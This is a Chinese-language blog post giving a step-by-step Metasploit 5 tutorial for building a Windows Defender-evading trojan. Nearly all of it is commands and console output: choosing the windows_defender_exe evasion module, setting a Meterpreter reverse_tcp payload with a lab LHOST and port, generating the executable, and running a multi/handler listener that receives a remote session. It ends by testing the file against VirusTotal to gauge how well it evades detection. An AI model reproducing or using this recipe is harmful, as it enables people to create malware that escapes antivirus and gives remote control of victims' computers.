使用metasploit中Evasion模块

简介

几天前我说了kali这次更新我最关心的是metasploit升级到了5.0,5.0中有一个新的模块叫Evasion模块,这个模块可以轻松的创建反杀毒软件的木马,今天我们就来试一试

操作

首先打开metasploit

msfconsole

你会看到下面这个界面

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
➜  ~ msfconsole
This copy of metasploit-framework is more than two weeks old.
Consider running 'msfupdate' to update to the latest version.



.:okOOOkdc' 'cdkOOOko:.
.xOOOOOOOOOOOOc cOOOOOOOOOOOOx.
:OOOOOOOOOOOOOOOk, ,kOOOOOOOOOOOOOOO:
'OOOOOOOOOkkkkOOOOO: :OOOOOOOOOOOOOOOOOO'
oOOOOOOOO.MMMM.oOOOOoOOOOl.MMMM,OOOOOOOOo
dOOOOOOOO.MMMMMM.cOOOOOc.MMMMMM,OOOOOOOOx
lOOOOOOOO.MMMMMMMMM;d;MMMMMMMMM,OOOOOOOOl
.OOOOOOOO.MMM.;MMMMMMMMMMM;MMMM,OOOOOOOO.
cOOOOOOO.MMM.OOc.MMMMM'oOO.MMM,OOOOOOOc
oOOOOOO.MMM.OOOO.MMM:OOOO.MMM,OOOOOOo
lOOOOO.MMM.OOOO.MMM:OOOO.MMM,OOOOOl
;OOOO'MMM.OOOO.MMM:OOOO.MMM;OOOO;
.dOOo'WM.OOOOocccxOOOO.MX'xOOd.
,kOl'M.OOOOOOOOOOOOO.M'dOk,
:kk;.OOOOOOOOOOOOO.;Ok:
;kOOOOOOOOOOOOOOOk:
,xOOOOOOOOOOOx,
.lOOOOOOOl.
,dOd,
.

=[ metasploit v5.0.2-dev-c808cbe0509d4e8819879c6e1ed8bda45c34a19f]
+ -- --=[ 1851 exploits - 1046 auxiliary - 321 post ]
+ -- --=[ 541 payloads - 44 encoders - 10 nops ]
+ -- --=[ 2 evasion ]
+ -- --=[ ** This is Metasploit 5 development branch ** ]

之后使用evasion模块,首先看看有什么evasion模块

1
2
3
4
5
6
7
8
9
msf5 > show evasion

evasion
=======

Name Disclosure Date Rank Check Description
---- --------------- ---- ----- -----------
windows/windows_defender_exe normal No Microsoft Windows Defender Evasive Executable
windows/windows_defender_js_hta normal No Microsoft Windows Defender Evasive JS.Net and HTA

使用windows/windows_defender_exe这个模块

use windows/windows_defender_exe

查看要配置的参数

show options

1
2
3
4
5
6
7
8
9
10
11
12
13
14
msf5 evasion(windows/windows_defender_exe) > show options

Module options (evasion/windows/windows_defender_exe):

Name Current Setting Required Description
---- --------------- -------- -----------
FILENAME oDlIipoP.exe yes Filename for the evasive file (default: random)


Evasion target:

Id Name
-- ----
0 Microsoft Windows

就一个文件名参数可以配置

set FILENAME bboysoul.exe

之后使用reverse_tcp payload

set payload windows/meterpreter/reverse_tcp

设置端口和ip

set LHOST 10.10.10.186

set LPORT 4444

生成木马文件

exploit

之后打开一个监听端口

use multi/handler

设置payload

set payload windows/meterpreter/reverse_tcp

设置主机和端口

set LHOST 10.10.10.186

set LPORT 4444

执行

exploit

接着我们把生成出来的木马在远端要被控制的windows机器上运行我们这里就可以接收到这个回话了

1
2
3
4
5
6
msf5 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 10.10.10.186:4444

^@[*] Sending stage (179779 bytes) to 10.10.10.167
[*] Meterpreter session 1 opened (10.10.10.186:4444 -> 10.10.10.167:52882) at 2019-02-23 13:37:14 +0800

上面都是常规操作,之后我们扫描病毒

打开

www.virustotal.com

放入文件扫描

只有33个病毒引擎扫描出来了,说明还可以

欢迎关注Bboysoul的博客www.bboysoul.com

Have Fun

Bboysoul wechat
欢迎添加我的微信
0%